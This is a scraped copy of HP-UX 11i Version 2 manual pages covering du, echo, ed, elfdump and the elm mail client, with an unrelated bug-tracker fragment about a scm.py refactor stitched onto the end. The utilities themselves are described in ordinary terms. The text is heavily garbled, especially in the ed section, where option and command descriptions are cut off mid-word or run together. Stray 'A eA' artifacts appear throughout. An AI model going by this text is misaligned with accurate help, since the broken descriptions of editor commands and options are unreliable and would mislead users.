-s Print only the grand total of disk usage for each of the specified name operands.
-x Restrict reporting to only those files that have the same device as the file specified
by the name operand. Disk usage is normally reported for the entire directory
hierarchy below each of the given name operands.
-t type Restrict reporting to file systems of the specified type . (Example values for type are
hfs, cdfs, nfs, etc.) Multiple -t type options can be specified. Disk usage is
normally reported for the entire directory hierarchy below each of the given name
operands.
EXAMPLES
Display disk usage for the current working directory and all directories below it, generating error mes-
sages for unreadable directories:
du -r
Display disk usage for the entire file system except for any cdfs or nfs mounted file systems:
du -t hfs /
Display disk usage for files on the root volume (/) only. No usage statistics are collected for any other
mounted file systems:
du -x /
WARNINGS
Block counts are incorrect for files that contain holes.
SEE ALSO
df(1M), bdf(1M), quot(1M).
STANDARDS CONFORMANCE
du: SVID2, SVID3, XPG2, XPG3, XPG4
Section 1−−200 Hewlett-Packard Company −1− HP-UX 11i Version 2: August 2003
echo(1) echo(1)
NAME
echo - echo (print) arguments
SYNOPSIS
echo [ arg ] ...
DESCRIPTION
echo writes its arguments separated by blanks and terminated by a new-line on the standard output. It
also understands C-like escape conventions; beware of conflicts with the shell’s use of \:
\a write an alert character
\b backspace
\c print line without appending a new-line
\f form-feed
\n new-line
\r carriage return
\t tab
\v vertical tab A eA
\\ backslash
\n the 8-bit character whose ASCII code is the 1-, 2-, 3- or 4-digit octal number n, whose first
character must be a zero.
\0num write an 8-bit value that is the zero-, one-, two- or three-digit octal number num
echo is useful for producing diagnostics in command files and for sending known data into a pipe.
Notes
Berkeley echo differs from this implementation. The former does not implement the backslash escapes.
However, the semantics of the \c escape can be obtained by using the -n option. The echo command
implemented as a built-in function of csh follows the Berkeley semantics (see csh (1)).
EXTERNAL INFLUENCES
Environment Variables
LC_CTYPE determines the interpretation of arg, echo behaves as if all internationalization variables are set to "C". See environ (5).
AUTHOR
echo was developed by OSF and HP.
SEE ALSO
sh(1).
BUGS
No characters are printed after the first \c. This is not normally a problem.
STANDARDS CONFORMANCE
echo: SVID2, SVID3, XPG2, XPG3, XPG4, POSIX.2
HP-UX 11i Version 2: August 2003 −1− Hewlett-Packard Company Section 1−−201
ed(1) ed(1)
NAME
ed, red - line-oriented text editor
SYNOPSIS
ed [-p string ] [-s-] [-x] [file ]
red [-p string ] [-s-] [-x] [file ]
DESCRIPTION
The ed command executes a line-oriented text editor. It is most commonly used in scripts and nonin-
ter
A eA
<:t5,10,15 s72:>
the tab stops would be set at columns 5, 10, and 15, and a maximum line length of 72 would be imposed.
Note: When you input text, ed expands tab characters as they are typed to every eighth column as a
default.
Regular Expressions
ed supports the Basic Regular Expression (RE) syntax (see regexp (5)), with the following additions:
• The null RE (for example, //) is equivalent to the last RE encountered.
• If the closing delimiter of an RE or of a replacement string (for example, /) would be the last
character before a newline, that delimiter can be omitted, in which case the addressed line is
printed. The following pairs of commands are equivalent:
Section 1−−202 Hewlett-Packard Company −1− HP-UX 11i Version 2: August 2003
ed(1) ed(1) accord-
ing to the following rules:
1. The character . refers to the current line.
2. The character $ refers to the last line of the buffer. the first line found by searching forward from the
line following the current line toward the end of the buffer and stopping at the first line contain- A eA
ing a string matching the RE. If necessary, the search wraps around to the beginning of the
buffer and continues up to and including the current line, so that the entire buffer is searched.
(Also see WARNINGS below.)
6. An RE enclosed by question marks (?RE ?) addresses the first line found by searching back-
ward from the line preceding the current line toward the beginning of the buffer and stopping at
the first line containing a string matching the RE. If necessary, (ˆ) and - charac-
ters.
Addresses are usually separated from each other by a comma (,). They can also be separated by a semi-
colon (;),, num-
bered, or printed, as discussed below under the l, n, and p commands.
(.)a The a (append) command reads text and appends it after the addressed line. Upon com-
text pletion, the new current line is the last inserted line, or, if no text was added, at the
. addressed line. Address 0 is legal for this command, causing the appended text to be
placed at the beginning of the buffer.
HP-UX 11i Version 2: August 2003 −2− Hewlett-Packard Company Section 1−−203
ed(1) ed(1)
(.,.)c The c (change) command deletes the addressed lines then accepts input text to replace
text the current
file name.
Section 1−−204 Hewlett-Packard Company −3− HP-UX 11i Version 2: August 2003
ed(1) ed(1) A eA
printed. The n command can be appended to any command other than e, f, r, or com-
mand com-
mands)..
HP-UX 11i Version 2: August 2003 −4− Hewlett-Packard Company Section 1−−205
ed(1) ed(1)
When the character % is the only character in replacement , the replacement used in the
most recent substitute command is used as the replacement in the current substitute com-
mand. The % loses its special meaning when it is in a replacement string containing
more than one character or when preceded by a \.
A line can be split by substituting a newline character into it. The newline in replace-
ment
A eA line is written in the format specified for the n command.
p Write to standard output the final line in which a substitution was made. The
line is written in the format specified for the p command.
(.,. any-
thing in the buffer, that is, the most recent a, c, d, g, G, i, j, m, r, s, t, v, or V com-
mand. immedi-
ately expli-
citly empty key turns off encryption.
($)= The line number of the addressed line is displayed. The current line address is
unchanged by this command.
com-
mand,.
Section 1−−206 Hewlett-Packard Company −5− HP-UX 11i Version 2: August 2003
ed(1) ed(1) vari-
able set-
ting, all internationalization variables default to "C". See environ (5).
If LC_ALL is set to a nonempty string value, it overrides the values of all the other internationalization
variables, including LANG.
A eA
LC_CTYPE determines the interpretation of text as single- and/or multibyte. ‘w’,
ed(1) allows a Maximum Line Length of 4096 characters. Attempting to create lines longer than
the allowable limit causes ed(1) to produce a Line too long error message.)).
HP-UX 11i Version 2: August 2003 −6− Hewlett-Packard Company Section 1−−207
ed(1) ed(1)
If the editor input is coming from a command file (e.g., ed file < ed-cmd-file), the editor exits at
the first failure of a command in the command file.
When reading a file, ed discards ASCII NUL characters and all characters after the last newline. This
can cause unexpected behavior when using regular expressions to search for character sequences contain-
ing).
A eA The ed section in Text Processing: User’s Guide .
STANDARDS CONFORMANCE
ed: SVID2, SVID3, XPG2, XPG3, XPG4, POSIX.2
red: SVID2, SVID3, XPG2, XPG3
Section 1−−208 Hewlett-Packard Company −7− HP-UX 11i Version 2: August 2003
elfdump(1) elfdump(1)
NAME
elfdump - dump information contained in object files.
SYNOPSIS
elfdump [-acCdfghHjkLopqrsStuUvV] [-dc] [-dl] [-tx] [-tv] [-D num ] [+D num2 ]
[+interp] [+linkmap] [+linkmap_bss] [+linkmap_file] [-n name ] [+objdebug] [+s
section ] [-T num ] [+T num2 ] files ...
DESCRIPTION
elfdump takes one or more object files or libraries and dumps information about them. The following
options are supported:
-a Dumps archive headers from an archive library.
-c Dumps the string table(s).
-C (Modifier) Demangles C++ symbol names before printing them. This modifier is valid
with -c, -r, -s, and -t. If specified with -H, this modifier is ignored. If specified with
-n name, the symbol whose unmangled name matches name will be printed, and its sym- A eA
bol name will be printed as a demangled name.
-d Prints the .note section which contains the compilation unit dictionary and linker foot-
print. This option has the same effect as elfdump -dc -dl.
-dc Prints the compilation unit dictionary of the .notes section.
-dl Prints the linker footprint of the .notes section. The linker footprint has information on
the linker used to generate the file as well as the link time.
-D num (Modifier) Prints the section whose index is num.
+D num2 (Modifier) Prints the sections in the range 1 to num2. If used with -D, the sections in the
range num to num2 are printed. Valid with -h, -r, -s. If used with -r, only the reloca-
tions which apply to the section(s) in the range are printed.
-f Dumps the file header (ELF header).
-g Dumps global symbols from an archive.
-h Dumps the section headers.
-H (Modifier) Dumps output information in hexadecimal, octal, or decimal format, with all
options.
+interp Displays the run-time interpreter path name for a.out (usually the location of the
dynamic loader and microloader). Only shared bound executables have this string. To
change the setting, use the ld +interp command.
-j Prints the object dictionary for one or more executable files, if the source file was com-
piled with the +objdebug option. The object dictionary entry contains the name of the
object file that contributed to a particular section, the relative offset within the section,
size of the object file’s contribution, and attributes of the entry.
-k Prints the CTTI section headers according to the directory member relationship.
-L Dumps the .dynamic section in shared libraries and dynamically linked program files.
+linkmap Prints the .linkmap section, which is only created when the incremental linker is used
(with the ld +ild command), or when the linker option +objdebug is used (which is
the default), along with the compiler option, -g (which is NOT the default).
+linkmap_bss
Prints the .linkmap_bss section, which is only created when the incremental linker is
used (with the ld +ild command), or when the linker option +objdebug is used
(which is the default), along with the compiler option, -g (which is NOT the default).
+linkmap_file
Prints the .linkmap_file section, which is only created when the incremental linker is
used (with the ld +ild command), or when the linker option +objdebug is used
(which is the default), along with the compiler option, -g (which is NOT the default).
-n name (Modifier) Dumps information about the specified section or symbol name. This option is
valid with -h, -r, -s, and -t. If used with -t, name pertains to a symbol name and
HP-UX 11i Version 2: August 2003 −1− Hewlett-Packard Company Section 1−−209
elfdump(1) elfdump(1)
elfdump will only dump the symbol entry whose name matches name. If used with the
other options, name pertains to a section name and elfdump will only dump the section
whose name matches it.
-o Dumps the optional headers (program headers).
-p (Modifier) Do not print titles, with all options.
-q (Modifier) Suppresses printing CTTI section headers. Valid with -k option.
-r Dumps the relocations.
-s Dumps the section contents.
+objdebug Dumps any section beginning with .objdebug_ as a string table.
+s name (Modifier) Dumps the section specified by name. Valid with -c and -t only.
-S (Modifier) Dumps output information in short format. Valid with the -h and -o options.
-t Dumps the symbol table entries.
A eA -tx Dumps the value of st_shndx in symbol table, in addition to information dump from -t
option. This option is useful to verify the data stored in the symbol table.
-T num Prints the symbol whose index is num.
+T num2 (Modifier) Prints the symbols in the range 0 to num2. If used with -T, print the symbols
in the range num to num2. Valid with -t.
-tv Prints versioned symbols.
-u Prints the usage menu.
-U Prints the unwind table.
-v (Modifier) Verifies the CTTI section headers before printing. Valid with the -k option.
-V Prints the version number for elfdump.
EXAMPLES
To see the functions exported from a shared library:
$ elfdump -s -n .dynsym libsubs.so | grep ’FUNC GLOB’ | grep -v UNDEF
To see the global data items exported from a shared library:
$ elfdump -s -n .dynsym libsubs.so | grep ’OBJT GLOB’ | grep -v UNDEF
To display string table information (.strtab):
$ elfdump -c subs.o
To list the shared libraries (.sl) linked with a program or shared library (dependent libraries):
$ elfdump -L a.out | grep Needed
$ chatr a.out # shared library list
To list the embedded path for shared libraries (.so) opened by a program:
$ elfdump -L a.out | grep Rpath # or
$ elfdump -s -n .dynamic a.out | grep Rpath
$ chatr a.out # embedded path
SEE ALSO
System Tools
ld(1) Invoke the link editor
Miscellaneous
a.out (4) Assembler, compiler, and linker output
elf (3E) Executable and Linking Format
Section 1−−210 Hewlett-Packard Company −2− HP-UX 11i Version 2: August 2003
elfdump(1) elfdump(1)
A eA
HP-UX 11i Version 2: August 2003 −3− Hewlett-Packard Company Section 1−−211
elm(1) elm(1)
NAME
elm - process electronic mail through a screen-oriented interface
SYNOPSIS
elm [-aKkmtVz] [-f folder ]
elm [-s subject ] address-list
elm -c [alias-list ]
elm -h
elm -v
DESCRIPTION
The elm program is a screen-oriented electronic mail processing system. It supports the industry-wide
MIME standard for nontext mail, a special forms message and forms reply mechanism, and an easy-to-
use alias system for individuals and groups. elm operates in three principal modes:
A eA • Interactive mode, running as an interactive mail interface program. (First syntax.)
• Message mode, sending a single interactive message to a list of mail addresses from a shell com-
mand line. (Second syntax.)
• File mode, sending a file or command output to a list of mail addresses via a command-line pipe or
redirection. (Second syntax.)
In all three cases, elm honors the values that are set in your elmrc initialization file, in your elm alias
database, and in the system elm alias database.
The modes are described below in inverse order (shortest description to longest).
Options
The following options are recognized:
-a Set arrow=ON. Use the arrow (->) instead of the inverse bar to mark the current
item in the various indexes. This overrides the setting of the arrow boolean vari-
able (see the ELM CONFIGURATION section).
-c Check alias. Check the aliases in alias-list against your personal elm alias data-
base and the system elm alias database. The results are written to standard out-
put. Errors are reported first, in the form:
(alias "alias" is unknown)
Successes are reported in a header-entry format, with group aliases replaced by
their members, in the form:
Expands to: alias-address (fullname ),
alias-address (fullname ),
...
alias-address (fullname )
If there is no fullname , the " (fullname )" portion is omitted.
-f folder Folder file. Read mail from the folder file rather than from the incoming mailbox.
A folder file is in the standard mail file format, as created by the mail system or
saved by elm itself.
-h Help. Display an annotated list of command-line options.
-k Set softkeys=OFF. Disable the use of softkeys (HP 2622 function keys). This
overrides the setting of the softkeys boolean variable (see the ELM CONFI-
GURATION section).
-K Set keypad=OFF and softkeys=OFF. Disable the use of softkeys and arrow cur-
sor keys. If your terminal does not have the HP 2622 function key protocols, this
option is required. This overrides the settings of the keypad and softkeys
boolean variables (see the ELM CONFIGURATION section).
Section 1−−212 Hewlett-Packard Company −1− HP-UX 11i Version 2: August 2003
elm(1) elm(1)
-m Set menu=OFF. Do not display the command menus on several Interactive Mode
screens. This overrides the setting of the menu boolean variable (see the ELM
CONFIGURATION section).
-s subject Subject. Specify the subject for a File Mode or Message Mode message.
-t Set usetite=OFF. Do not use the termcap ti/te and terminfo cup cursor-
positioning entries. This overrides the setting of the usetite boolean variable
(see the ELM CONFIGURATION section).
-V Verbose transmission. Pass outbound messages to the sendmail mail transport
agent using the -v option (see sendmail (1M)).
-v Version. Print out the elm version information. This displays the version number
and the compilation features that were specified or omitted.
-z Zero. Do not enter elm if there is no mail in the incoming mailbox.
Operands
The following operands are recognized: A eA
address-list A blank-separated list of one or more mail addresses, your elm user aliases, or elm
system aliases.
alias-list A blank-separated list of one or more of your elm user aliases or elm system
aliases.
Terminology
The following terms are used throughout this manpage.
blank A space or a tab character, sometimes known as linear white space.
body The body of a message. See message.
boolean variable
See configuration variable.
configuration variable
A boolean, numeric, or string variable that defines default behavior in the elm mail system.
See the ELM CONFIGURATION section.
elm system alias text file
The source file, /var/mail/.elm/aliases.text, for the elm system alias database.
elm user alias text file
The source file , $HOME/.elm/aliases.text, for a user’s own elm alias database.
elm user headers file
A file, $HOME/.elm/elmheaders, where a user can specify special header entries that are
included in all outbound messages.
elmrc configuration file
A file, $HOME/.elm/elmrc, that defines the initial values for elm configuration variables.
environment variable
A global variable set in the shell that called elm. See the EXTERNAL INFLUENCES section.
folder A file that contains mail messages in the format created by sendmail or elm.
full name
The first and last name of a user, as extracted from an alias text file or from the
/etc/passwd file.
header The header of a message. See message.
header entry
An entry in the header portion of a message, sometimes called a header field.
incoming mailbox
The mailbox where you receive your mail, usually /var/mail/loginname.
mail directory
The directory, defined by the maildir string variable, where a user normally stores mail
messages in folders.
HP-UX 11i Version 2: August 2003 −2− Hewlett-Packard Company Section 1−−213
elm(1) elm(1)
FILE MODE
If standard input is connected to a pipe or to a file, and an address-list is specified, elm operates in File
Mode.
The output of the previous command in the pipe, or the content of the file, is mailed to the members of the
address-list . The address-list is expanded, based on your elm alias database and the system elm alias
database, and placed in the To: header entry.
If -s is omitted or subject is null, subject defaults to:
no subject (file transmission)
The expressed or default value of subject is placed in the Subject: header entry.
See the EXAMPLES section.
MESSAGE MODE
If standard input is connected to your terminal, and an address-list is specified, elm operates in Message
Mode.
The address-list is expanded, based on your elm alias database and the system elm alias database, and
placed in the To: header entry. The To: header entry is displayed, in the same form as for the Message
Menu m (mail) command in Interactive Mode.
The value of subject , if nonnull, or a null string, is placed in the Subject: header entry and the Sub-
ject: line is displayed for modification.
If askcc is ON in your elmrc file, you are prompted for Copies to:.
Then the editor defined by the editor string variable (if a signature file is not added) or the altedi-
tor string variable (if a signature file is added) is started so that you can write your message.
Section 1−−214 Hewlett-Packard Company −3− HP-UX 11i Version 2: August 2003
elm(1) elm(1)
When you leave your editor, you enter the Send Menu, as described for Interactive Mode.
If you choose the Send Menu s (send) command, the message is sent and the program terminates. If you
select the Send Menu f (forget) command, the message is stored in $HOME/Canceled.mail and the
program terminates. If you select other commands, the appropriate action occurs.
See the EXAMPLES section.
INTERACTIVE MODE
If standard input is connected to your terminal, and there is no address-list , elm operates in a screen-
oriented Interactive Mode.
If you do not have a $HOME/.elm directory, or if you do not have a mail directory, defined by the mail-
dir string variable, you are asked in turn if they should be created. You can answer y for yes , n for no,
or q for quit . For y or n, the directories are created or not, as appropriate, and the program continues.
For q, the program terminates.
Overview
When invoked, elm reads customized variables from file $HOME/.elm/elmrc (if it exists) to initialize A eA
parameters. This file can be saved from within elm and some of these variables can also be modified
with the Message Menu o (option) command.
elm first displays the Main or Message Menu, which shows index entries for the messages in your incom-
ing mailbox or selected mail folder. Among other options, you can read, print, reply to, and forward these
messages, as well as initiate new mail messages to other users.
You can also move to the Alias Menu, where you can create, modify, and delete your personal aliases.
From the Alias Menu, you can select one or more of your aliases and send a message to the corresponding
users.
When you send a message, you can include attachments in a number of formats, such as PostScript,
images, audio, and video, as well as plain text. The attachments are managed separately, which can be
convenient both for you and your correspondents.
Sending Messages
When you send a message, you use the editor defined by the editor or alteditor string variable. If
builtin is your editor, a set of commands described in the Built-In Editor subsection is available while
composing your message
If the elmheaders file exists (see the HEADER FILE section), all nonblank lines in the file are copied to
the headers of all outbound mail. This is useful for adding special information headers such as X-
Organization:, X-Phone:, and so forth.
MIME Support
elm supports the MIME protocols for headers and messages (RFC 1521 and RFC 1522) enabling it to
view and send mail containing other than normal ASCII text. For example, the mail contents can be
audio, video, images, etc., or a combination of these.
This also enables conformance with SMTP (RFC 821), which allows only 7-bit characters in the message,
by using MIME-encoding (base64 and quoted-printable) to convert 8-bit data to 7-bit.
elm also provides a facility to view multipart MIME messages. If elm receives a message whose type is
not text/plain, it invokes metamail, which invokes the appropriate utility (for example, ghost-
view, xv, an audio editor, mpeg) to display the different mail parts according to the content type (for
example, application/postscript, image, audio, video).
Aliases
elm has its own alias system that supports both personal and system-wide aliases. Personal aliases are
specific to a single user; system aliases are available to everyone on the system where the system aliases
reside (see newalias (1)). You can access the Alias Menu by executing the Message Menu a (alias) com-
mand. You can then create and save an alias for the current message, create and check other aliases, and
send messages to one or more aliases.
Aliases are limited to 2500 bytes. If you wish to create a group alias that is longer than 2500 bytes,
please ask your system administrator to create it for you in the sendmail system alias file,
/etc/mail/aliases (see sendmail (1M)).
HP-UX 11i Version 2: August 2003 −4− Hewlett-Packard Company Section 1−−215
elm(1) elm(1)
Message Menu
The Message Index is displayed on the Message Menu. You can use the following commands to manipu-
late and send messages. Some commands use a series of prompts to complete their action. You can use
Ctrl-D to cancel their operations.
The commands are:
!command Shell Escape. Send command to the shell defined by the shell string variable
without leaving elm.
# Display all known information about the current message.
$ Resynchronize the messages without leaving elm. If there are any messages
marked for deletion, you are asked if you want to delete them. If any messages are
A eA deleted or any status flags have changed, the messages are written back to the mail-
box file. All tags are removed.
% Display the computed return address of the current message.
* Set the current message pointer to the last message.
+ Display the next message index page, when applicable.
- Display the previous message index page, when applicable.
/pattern Pattern match. Search for pattern in the from and subject fields of the current mes-
sage index. The search starts at the current message and wraps around to the
beginning of the index. The current message pointer is set to the first message that
matches. Uppercase and lowercase are treated as equivalent.
//pattern Pattern match. Search for pattern through all the lines of the current folder. The
search starts at the current message and wraps around to the beginning of the
folder. The current message pointer is set to the first message that matches.
Uppercase and lowercase are treated as equivalent.
< Calendar. Scan message for calendar entries and add them to your calendar file. A
calendar entry is defined as a line whose first nonblank characters are ->, as in:
->calendar-entry
The delimiter -> and surrounding blanks are removed before the entry is added to
the calendar file. Resultant blank lines are ignored. You can define the calendar
file name in your elmrc file or with the Options Menu.
= Set the current message pointer to the first message.
> Save in folder. Same as the Message Menu s (save) command.
?key ... Help on key. Display a one-line description of what each key does. ? displays a
summary listing for each command available. A period (.) returns you to the Mes-
sage Menu.
@ Display a summary of the messages indexed on the current screen.
| Pipe the current message or the set of tagged messages through other filters as
desired. Use the shell defined by the shell string variable.
n New current message. Change the current message pointer to the one indexed as n.
If the message is not on the current page of headers, the appropriate page
displayed.
Return Read current message. The screen is cleared and the current message is displayed
by the pager defined by the pager string variable.
a Alias. Switch to the Alias Menu.
b Bounce mail. This is similar to forwarding a message, except that you do not edit
the message and the return address is set to the original sender’s address, rather
than to your address.
Section 1−−216 Hewlett-Packard Company −5− HP-UX 11i Version 2: August 2003
elm(1) elm(1)
c Change folder. This command is used to change the file whose messages are
displayed on the Message Menu. You are asked for a file name. The file must be in
message format; otherwise, elm aborts. You can use the customary wildcards for
your shell, as well as the following special names:
! Your incoming mail folder.
> Your received folder, defined by the receivedmail string vari-
able.
< Your sent folder, defined by the sentmail string variable.
. The previously used folder.
@alias The default folder for the login name associated with the alias
alias.
=filename A file in the directory defined by the maildir string variable.
C Copy message. Save the current message or the set of tagged messages to a folder.
You are prompted for a file name with a default value. The default value is a file in A eA
the maildir directory with the user name of the sender of the first message in the
set being saved. Any tags are cleared. Unlike the > and s commands, the messages
are not marked for deletion and the current message pointer is not moved.
d Delete. Mark the current message for deletion. See also Ctrl-D, u, and Ctrl-U.
Ctrl-D Delete. Mark all messages for deletion that contain a specified pattern in the
From: and Subject: header entries. See also d, u, and Ctrl-U.
e Edit. Allows you to physically edit the current mail folder using the editor defined
by the editor string variable. When you exit from your editor, elm resynchron-
izes your mail folder (see the $ command).
f Forward the current message. You are asked if you want to edit the outbound mes-
sage. If you answer y, the characters defined by the prefix string variable are
prefixed to each line of the message and the editor defined by the editor string
variable will be invoked to allow you to edit the message. If you answer n, the char-
acters are not prefixed and the editor will not be invoked. In either case, you are
prompted for To: recipients, allowed to edit the Subject: header entry, and, if
the askcc boolean variable is ON, you are prompted for Cc: recipients.
If the userlevel numeric variable is 1 (intermediate) or 2 (expert), and there
was a previous sent or forgotten message in this session, you are asked if you would
like to
Recall last kept message instead? (y/n)
If you answer y, the previous message is returned to the send buffer. If you answer
n, the current message is copied into the send buffer and your signature file (if any)
is appended.
Then the editor is invoked if you chose to edit the outbound message (above). When
you leave the editor, or if it was not invoked, the Send Menu is displayed.
g Group reply. The reply is automatically sent To: the sender of the message, with
Cc: to all the original To: and Cc: recipients. Otherwise, the action is the same
as for the r command.
h Same as Return, except that the message is displayed with all headers.
j Move down. Move the current message pointer down to the next message.
J Move down. Move the current message pointer down to the next undeleted mes-
sage.
k Move up. Move the current message pointer up to the previous message.
K Move up. Move the current message pointer up to the previous undeleted message.
l (ell) Limit the displayed messages to those that contain certain string values. You are
prompted with Enter criteria:. To set, add to, or clear the limiting criteria,
type one of:
HP-UX 11i Version 2: August 2003 −6− Hewlett-Packard Company Section 1−−217
elm(1) elm(1)
all Clear all the criteria and restore the normal display.
from string Restrict to entries that contain string in the From: header.
subject string Restrict to entries that contain string in the Subject:
header.
to string Restrict to entries that contain string in the To: header.
You can add limiting criteria by repeating the l command.
Ctrl-L Redraw the screen.
m Mail. Send mail to one or more addresses. You are prompted for To: recipients, a
Subject: and, if the askcc boolean variable is ON, Cc: recipients.
If the userlevel numeric variable is 1 (intermediate) or 2 (expert), and there
was a previous sent or forgotten message in this session, you are asked if you would
like to
Section 1−−218 Hewlett-Packard Company −7− HP-UX 11i Version 2: August 2003
elm(1) elm(1)
provided by the alwayskeep boolean variable (ON means y (yes) and OFF
means n (no)).
If you answer y, all undeleted unread (new and old) messages are returned to
your incoming mailbox.
If you answer n, all undeleted unread messages will be moved to the folder
defined by the receivedmail string variable.
If the ask boolean variable is OFF, the answers to the questions (which are not
displayed) are taken automatically from the values of the alwaysdelete,
alwaysstore, and alwayskeep boolean variables, respectively.
Q Quick quit. This is equivalent to executing the q command with the ask boolean
variable set to OFF.
r Reply to the sender of the current message. If the autocopy boolean variable is
OFF, you are asked if the source message should be copied into the edit buffer. If it
is ON, the message is copied automatically. If copied in, all lines from the message
are preceded by the prefix string defined by the prefix string variable. The To: A eA
header is set to the sender of the message (or the address in the Reply-To:
header, if one was set), the Subject: is set to the subject of the message, preceded
by Re:, and presented for you to edit. If the askcc boolean variable is ON, you are
prompted for Cc: recipients. Then, the editor defined by the editor string vari-
able is invoked. After you exit from your editor, the Send Menu is displayed.
s Save in folder (same as >). Save the current message or the set of tagged messages
to a folder. You are prompted for a file name with a default value. The default
value is a file in the maildir directory with the login name of the sender of the
first message in the set being saved. Any tags are cleared and the messages are
marked for deletion. The current message pointer is moved to the first undeleted
message after the last saved message.
t Tag toggle. Tag the current message for a later operation and move the current
message pointer to the next undeleted message. The operation can be one of |, C,
p, and s.
Or, remove the tag from a tagged message. See also the Ctrl-T command.
T Tag toggle. Tag the current message for a later operation and remain at the current
message. The operation can be one of |, C, p, and s.
Or, remove the tag from a tagged message. See also the Ctrl-T command.
Ctrl-T Tag all messages containing the specified pattern. Or remove the tags from all
tagged messages.
If any messages are currently tagged, you are asked if the tags should be removed.
Answer y to remove the old tags; answer n to keep them. In either case, you are
prompted for a string to match in either the From: or Subject: line of each mes-
sage. All messages that match the criterion are tagged. If you enter a null string
(carriage-return alone), no more messages are tagged.
u Undelete. Remove the deletion mark from the current message. See also d, Ctrl-
D, and Ctrl-U.
Ctrl-U Undelete. Remove any deletion mark from all messages that contain a specified
pattern in the From: and Subject: header entries. See also d, Ctrl-D, and u.
v View attachments. Invoke the Attachment View Menu for the current message.
x Exit. Exit without changing the mailbox. If changes are pending, such as deletions,
you are asked if they can be abandoned. If you answer y, the changes are aban-
doned and the program terminates. If you answer n the exit is abandoned and you
return to the Message Menu command prompt.
X Exit immediately without changing the mailbox. All pending changes are aban-
doned.
HP-UX 11i Version 2: August 2003 −8− Hewlett-Packard Company Section 1−−219
elm(1) elm(1)
Message Index
The messages in the current folder are indexed on the Message Menu, one per line, in the format:
sssnum mmm d from (lines ) subject
defined as:
sss A three-character status field, described in the Message Status subsection.
num The ordinal message index number.
mmm The month from the last Date: header entry, or from the From message header.
d The day from the last Date: header entry, or from the From message header.
from Either the sender name from the last From: header entry or from the From message
header.
lines The number of lines in the message.
subject The subject description from the first Subject: header entry, truncated to fit your
A eA screen.
The current message index entry is either highlighted in inverse video or marked in the left margin with
an arrow (->). See the -a option in the Options subsection and the arrow string variable in the ELM
CONFIGURATION section.
Message Status
The first three characters of each message index entry describe the message status. Each can be blank or
one of the values described below in descending order of precedence.
When a message has more than one status flag of a particular type set, the highest-precedence indicator
is displayed on the index line. For example, if a forms message (F) is also marked as company
confidential (C), the C rather than the F status character is displayed.
Section 1−−220 Hewlett-Packard Company −9− HP-UX 11i Version 2: August 2003
elm(1) elm(1)
? MIME. The message or its attachments is in a MIME format whose version is not supported.
Blank. Normal status.
Built-In Editor
When you are composing an outbound message with the builtin built-in editor, it prompts you for text
lines with an empty line. Enter a period (.) to end the message and continue with the Send Menu.
Built-in editor commands are lines that begin with an escape character, defined by the escape string
variable. The default escape character is tilde (˜).
Note: Some remote login programs use tilde as their default escape character when it is the first charac-
ter on a line. (You can tell, because the tilde does not print.) Usually, the tilde is transmitted when you A eA
enter a second character that is not recognized by the program or when you enter a second tilde. See the
program documentation for further information.
The built-in editor commands are:
~! [command] Execute the shell command, if one is given (as in ˜!ls), or start an interac-
tive shell, using the shell defined by the shell string variable.
~< command Execute the shell command and place the output of the command into the edi-
tor buffer. For example, "˜< who" inserts the output of the who command in
your message.
~? Print a brief help menu.
~˜ Start a line with a single tilde (˜) character.
~b Prompt for changes to the Blind-Carbon-Copy (Bcc:) list.
~c Prompt for changes to the Carbon-Copy (Cc:) list.
~e Invoke the editor defined for the easyeditor string variable on the mes-
sage, if possible.
~f [options] Add the specified list of messages or the current message. This uses read-
mail which means that all readmail options are available (see read-
mail (1)).
~h Prompt for changes to all the available headers (To:, Cc:, Bcc:, and Sub-
ject:).
~m [options] Same as ˜f, but each line is prefixed with the current prefix. See the prefix
string variable.
~o Prompt for the name of an editor to use on the message.
~p Print out the message as typed in so far.
~r filename Include (read in) the contents of the specified file.
~s Prompt for changes to the Subject: line.
~t Prompt for changes to the To: list.
~v Invoke the editor defined for the visualeditor string variable on the mes-
sage, if possible.
Alias Menu
The Alias Menu is invoked with the Message Menu a command. The source text for your alias file is
stored in the file $HOME/.elm/aliases.text. You can edit this file directly or with the following
commands.
The aliases currently compiled into your database and the system database are displayed in an indexed
list similar to the Message Menu. The entry format is described in the Alias Index subsection. The index
is sorted in the order defined by the aliassortby string variable. | https://de.scribd.com/document/19344828/HPUX-Command-A-M | CC-MAIN-2019-26 | en | refinedweb |
getElementsByAttributeNS(ns, attrib, value )
- Return type: DOM NodeList
- Returns an array of all the child elements of the element that have the attribute namespace given by the first argument, the attribute name given by the second argument, and the value given by the third argument. If the namespace (first argument) is set to '*', elements with any attribute namespace will be retrieved. If the third argument is '*', the elements retrieved may have the attribute (second argument) set to any value.
- Note that this method is only available on XUL elements and is not part of the DOM. | https://developer.mozilla.org/en-US/docs/Mozilla/Tech/XUL/Method/getElementsByAttributeNS | CC-MAIN-2019-26 | en | refinedweb |
The QAbstractEventDispatcher class provides an interface to manage Qt's event queue. More...
#include <QAbstractEventDispatcher>
Inherits QObject. Qt Solution includes a reimplementation of QAbstractEventDispatcher that merges Qt and Motif events together.
See also QEventLoop and QCoreApplication.
Typedef for a function with the signature
bool myEventFilter(void *message);
See also setEventFilter() and filterEvent().
Typedef for QPair<int, int>. The first component of the pair is the timer ID; the second component is the interval.
See also registeredTimers().
Constructs a new event dispatcher with the given parent.
Destroys the event dispatcher.
This signal is emitted before the event loop calls a function that could block.
See also awake().
This signal is emitted after the event loop returns from a function that could block.
See also wakeUp() and aboutToBlock()..
See also setEventFilter().
Flushes the event queue. This normally returns almost immediately. Does nothing on platforms other than X11.
Returns true if there is an event waiting; otherwise returns false.
Returns a pointer to the event dispatcher object for the specified thread. If thread is zero, the current thread is used. If no event dispatcher exists for the specified thread, this function returns 0.
Note: If Qt is built without thread support, the thread argument is ignored.
Interrupts event dispatching; i.e. the event dispatcher will return from processEvents() as soon as possible. the QEventLoop::WaitForMoreEvents flag is not set in flags, and no events are available, this function will return immediately.
Note: This function does not process events continuously; it returns after all available events are processed.
See also hasPendingEvents().
Registers notifier with the event loop. Subclasses must implement this method to tie a socket notifier into another event loop.
Registers a timer with the specified interval for the given object.. Returns true if successful; otherwise returns false.
See also registerTimer() and unregisterTimers().
Unregisters all the timers associated with the given object. Returns true if all timers were successful removed; otherwise returns false.
See also unregisterTimer() and registeredTimers().
Wakes up the event loop.
Note: This function is thread-safe.
See also awake(). | https://doc.qt.io/archives/4.3/qabstracteventdispatcher.html | CC-MAIN-2019-26 | en | refinedweb |
Move scm.py into its own module in preparation for splitting it up
Created attachment 91833 [details]
Patch
Attachment 91833 [details] did not pass style-queue:
